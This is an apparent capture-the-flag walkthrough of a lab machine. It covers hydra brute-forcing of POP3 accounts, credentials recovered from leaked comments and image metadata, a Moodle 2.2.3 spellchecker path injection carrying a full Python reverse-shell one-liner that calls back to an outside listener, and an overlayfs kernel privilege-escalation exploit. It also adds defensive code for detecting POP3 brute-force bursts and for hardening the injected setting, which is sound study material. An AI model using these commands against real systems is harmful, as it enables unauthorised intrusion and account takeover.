Target IP: 10.10.93.234
Challenge Description:
Performing a port scan against the target machine shows there are four TCP ports open. There are SMTP and HTTP applications on their standard ports, but also two more applications on higher ports.
Performing an aggressive port scan against the four TCP ports returns the result above. By the looks of it, the higher ports have POP3 applications. I also obtained the application name which is Dovecot POP3. I will begin enumeration with the HTTP application on port 80 now.
Port 80: HTTP
The webpage above is displayed for this web application. This page informs me to visit /sev-home/ to log in. Maybe the source-code of this webpage contains useful information?
Viewing the source-code of this webpage returns the result above. The JavaScript file with the name terminal.js sounds interesting to me.
The source-code of terminal.js is shown above. The comment left behind gives a lot of information: I obtained two usernames, Boris and Natalya, as shown above. Apparently the user Boris is using a default password, and a new encoded password has been provided to him. I can decode this encoded password using Cyberchef.
Using Cyberchef, I decoded the password and obtained the string InvincibleHack3r. This password belongs to the user Boris.
Maybe I can use it at the /sev-home/ directory? I entered the credentials Boris:InvincibleHack3r, as shown above, and pressed Sign in. But it did not work. I tried the username in lowercase and it worked!
After logging in successfully, the webpage above was displayed to me. Apparently, to become an administrator of the system, I will need to email a qualified GNO supervisor. From previous enumeration, I know there are email applications running on the target machine. Maybe attacking these email applications can leak useful information? Before doing this, I will need to identify the possible GNO supervisors.
And bingo! The two possible qualified network operator supervisors are Natalya and Boris, as shown above.
Port 55007: POP3
I tried spraying the password InvincibleHack3r with the usernames Boris and Natalya against the POP3 application on this port, but I had no luck, as shown above. Time to bruteforce it.
I created a text file called usernames that contains just the username Natalya. Using hydra, I managed to bruteforce the password of the user Natalya. To do this, I used the command hydra -L usernames -P /usr/share/wordlists/fasttrack.txt pop3://10.10.93.234 -s 55007, as shown above. Now I have the credential Natalya:bird. Time to enumerate further.
Using the credentials, I managed to gain access to the emails of the user Natalya as shown above via POP3. This user has two emails.
The contents of the two emails are shown above. These emails contain a wealth of information: a set of new credentials xenia:RCP90rulez!, an internal hostname severnaya-station.com with the path /gnocertdir, and a username called Janus. Time to put this new information into practice.
I inserted the entry 10.10.93.234 severnaya-station.com inside my /etc/hosts file as shown above. Now time to visit the directory /gnocertdir as mentioned in the email.
Port 80: HTTP
Browsing to http://severnaya-station.com/gnocertdir/ displays the webpage above. It is running the application Moodle. Reading through the source-code of this webpage gives me some possible application versions, but it is hard to tell. Maybe once I log in as a user, I can obtain this information?
Maybe I can use the credentials xenia:RCP90rulez! here to log in as the user xenia.
After logging in successfully, the webpage above is presented to me. It mentions there is a new message from Dr Doak. Before reading this message, I wish to enumerate the application further to identify its version. After some digging around, I identified the application version is 2.2.3 which is vulnerable to RCE.
The email sent by Dr Doak to xenia is shown above. This email contains the new username doak. Maybe I can bruteforce the password again for this user doak via the POP3 application on the higher port?
Port 55007: POP3
And bingo! After bruteforcing the password of the username doak using hydra, I obtained the password goat as shown above. To bruteforce the password, I used the command hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://10.10.93.234 -s 55007. Time to read the emails of this user.
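Both hydra runs above (against natalya and against doak) leave the same trace on the server side: a burst of Dovecot pop3-login auth failures from one source IP followed by a successful login. The detector below is an added example, not part of the original walkthrough; it runs over constructed log lines modelled on Dovecot's pop3-login messages, using the attacker and target IPs from the walkthrough and a constructed benign client (10.10.93.50) as the negative case.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample modelled on Dovecot's pop3-login log lines (not real target logs).
SAMPLE_LOG = """\
Jan 10 12:00:01 severnaya dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=10.14.55.153, lip=10.10.93.234, session=<s1>
Jan 10 12:00:02 severnaya dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=10.14.55.153, lip=10.10.93.234, session=<s2>
Jan 10 12:00:04 severnaya dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=10.14.55.153, lip=10.10.93.234, session=<s3>
Jan 10 12:00:05 severnaya dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=10.14.55.153, lip=10.10.93.234, session=<s4>
Jan 10 12:00:07 severnaya dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=10.14.55.153, lip=10.10.93.234, session=<s5>
Jan 10 12:00:08 severnaya dovecot: pop3-login: Login: user=<natalya>, method=PLAIN, rip=10.14.55.153, lip=10.10.93.234, mpid=2101, session=<s6>
Jan 10 12:30:00 severnaya dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<xenia>, method=PLAIN, rip=10.10.93.50, lip=10.10.93.234, session=<s7>
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: "
    r"(?P<outcome>Login|Disconnected \(auth failed, (?P<n>\d+) attempts in \d+ secs\)): "
    r"user=<(?P<user>[^>]*)>, method=\S+, rip=(?P<rip>[\d.]+), lip=[\d.]+"
)

def analyse_pop3_log(text, threshold=5, window_secs=60):
    """One alert per source IP reaching `threshold` failed attempts inside `window_secs`."""
    fails, logins = defaultdict(list), defaultdict(list)   # rip -> [(time, user, attempts)]
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        when = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        if m["outcome"] == "Login":
            logins[m["rip"]].append((when, m["user"], 0))
        else:
            fails[m["rip"]].append((when, m["user"], int(m["n"])))
    alerts = []
    for rip, events in fails.items():
        events.sort()
        start = 0
        for end in range(len(events)):          # sliding window over failure times
            while (events[end][0] - events[start][0]).total_seconds() > window_secs:
                start += 1
            if sum(n for _, _, n in events[start:end + 1]) >= threshold:
                alerts.append({
                    "rip": rip,
                    "failures": sum(n for _, _, n in events),
                    "users": sorted({u for _, u, _ in events}),
                    # a login from the same IP after the burst is the compromise signal
                    "success_after": sorted({u for t, u, _ in logins[rip] if t >= events[end][0]}),
                })
                break
    return alerts
```

The alert carries the user list, which distinguishes a wordlist attack on one account (natalya) from spraying one password across accounts (boris and natalya).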
After logging in successfully as the user doak via telnet, I managed to obtain the only email. The contents of this email are shown above. This email contains the credentials dr_doak:4England! for the Moodle application. Maybe this user is the administrator of the application?
Port 80: HTTP
After logging in successfully as the user doak, the webpage above was presented to me.
This new user has a private file called s3cret.txt under the folder name for james, as shown above. The content of the s3cret.txt is also shown above. It informs me to visit /dir007key/for-007.jpg to obtain the new credentials.
Browsing to the new directory displays the image above. I downloaded this image on my machine.
Using the tool exiftool, I managed to identify the encoded base64 password string that is under the tag Image Description, as shown above.
Then using the command echo eFdpbnRlcjE5OTV4IQ== | base64 --decode, I managed to obtain the password xWinter1995x! as shown above. This belongs to the administrator of the web application according to the s3cret.txt.
And bingo! Using the credentials admin:xWinter1995x!, I managed to login as the administrator user on the Moodle application! Now I have admin access, as shown above.
And it looks like the application name and version are Moodle 2.2.3, as shown above. The build number of the version, Build: 20120514, is also shown.
Doing a Google search for Moodle 2.2.3 vulnerabilities led me to the website shown above. By the looks of it, the application is vulnerable to RCE due to a vulnerability in a spellchecker plugin. Time to find this plugin on the website. After some digging around, I identified the Aspell plugin is vulnerable. I can edit its path. Maybe I can replace the path with a Python reverse shell script to obtain a reverse shell connection?
I replaced the path of Aspell to the Python reverse shell script shown above. I started a listener on my machine at port 8443. The reverse shell I used is python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.55.153",8443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'. After this, I pressed the Save Changes button, but I did not obtain a connection back!
I also changed the Spell Engine to PSpellShell, as shown above.
Time to start the spellchecker application now. I created a new entry and pressed the spellcheck button, highlighted & circled in the image above. Then I immediately obtained a reverse shell connection from the target machine on my machine at port 8443.
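Why editing the Aspell path turns into code execution: the shell-based spell engine builds a shell command string from the admin-editable binary path, so a setting that is itself a command is run by /bin/sh when the spellcheck button is pressed. The snippet below is an added illustration in Python, not Moodle's own PHP code; it shows the vulnerable pattern, an audit check for the setting value, and a hardened builder (the allowlist paths and the truncated payload value are assumptions).

```python
import re
import subprocess

# Python analogue of a shell-based spell engine setting (not Moodle's own code).
def build_command_vulnerable(aspell_path, lang, wordfile):
    # Vulnerable pattern: the admin-editable path is spliced into a shell string, so a
    # setting that is itself a command (as in the walkthrough) is executed by /bin/sh.
    # `lang` is injectable for the same reason.
    return f"{aspell_path} -a --lang={lang} --encoding=utf-8 < {wordfile}"

ALLOWED_BINARIES = {"/usr/bin/aspell", "/usr/local/bin/aspell"}   # assumed allowlist

def validate_binary_setting(value):
    """Audit check for a stored setting: return the reasons it is unsafe ([] if fine)."""
    problems = []
    if not value.startswith("/"):
        problems.append("not an absolute path")
    if re.search(r"[\s;&|`$()<>]", value):
        problems.append("contains whitespace or shell metacharacters")
    if value not in ALLOWED_BINARIES:
        problems.append("not an allow-listed spellchecker binary")
    return problems

def build_command_hardened(aspell_path, lang):
    """Hardened form: validate the setting as a path, validate the language tag, and
    return an argv list so the arguments reach execve without shell parsing."""
    problems = validate_binary_setting(aspell_path)
    if problems:
        raise ValueError("unsafe spellchecker setting: " + "; ".join(problems))
    if not re.fullmatch(r"[a-z]{2}(_[A-Z]{2})?", lang):
        raise ValueError("invalid language tag")
    return [aspell_path, "-a", f"--lang={lang}", "--encoding=utf-8"]

def run_spellcheck(argv, words):
    # shell=False with a list argv: even a hostile `words` payload is only stdin data.
    return subprocess.run(argv, input=words, capture_output=True, text=True).stdout

# Constructed setting values: a legitimate path and one shaped like the walkthrough's
# payload (truncated here; the assumed "..." stands in for the rest of the one-liner).
GOOD_SETTING = "/usr/bin/aspell"
INJECTED_SETTING = "python -c 'import socket,subprocess,os; ...'"
```

Running validate_binary_setting over the stored engine path is a quick way to audit an existing instance for a tampered setting, which is also the artifact an attacker leaves behind after this technique.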
Now I have a foothold on the target machine with the session as www-data, as shown above. Time to escalate my privileges on the target machine.
After landing a shell, I browsed to /home and noticed there are three users: boris, doak, and natalya. I did not find anything important inside the directories of these users.
Running the command uname -r shows the crucial information above. The target machine's kernel version is 3.13.0-32-generic, which is vulnerable to overlayfs privilege escalation.
I downloaded the local privilege escalation exploit shown above on my machine.
After transferring the exploit to the target machine at /tmp, I noticed the target machine does not have gcc installed. Therefore, I used cc to compile the exploit. I used the command cc 37292.c -o exp to compile it. Then I used chmod +x exp to make the binary executable. I executed the exploit using ./exp and obtained a root shell, as shown above. Before doing all this, I was stuck and needed help. I had to execute the command sed -i "s/gcc/cc/g" 37292.c to avoid the gcc compilation error. Now I have a root shell.
The .root.txt flag is shown above. But this flag file informs me to visit /006-final/xvf7-flag/.
And bingo! The webpage above is shown to me after visiting the final webpage. All done. GG.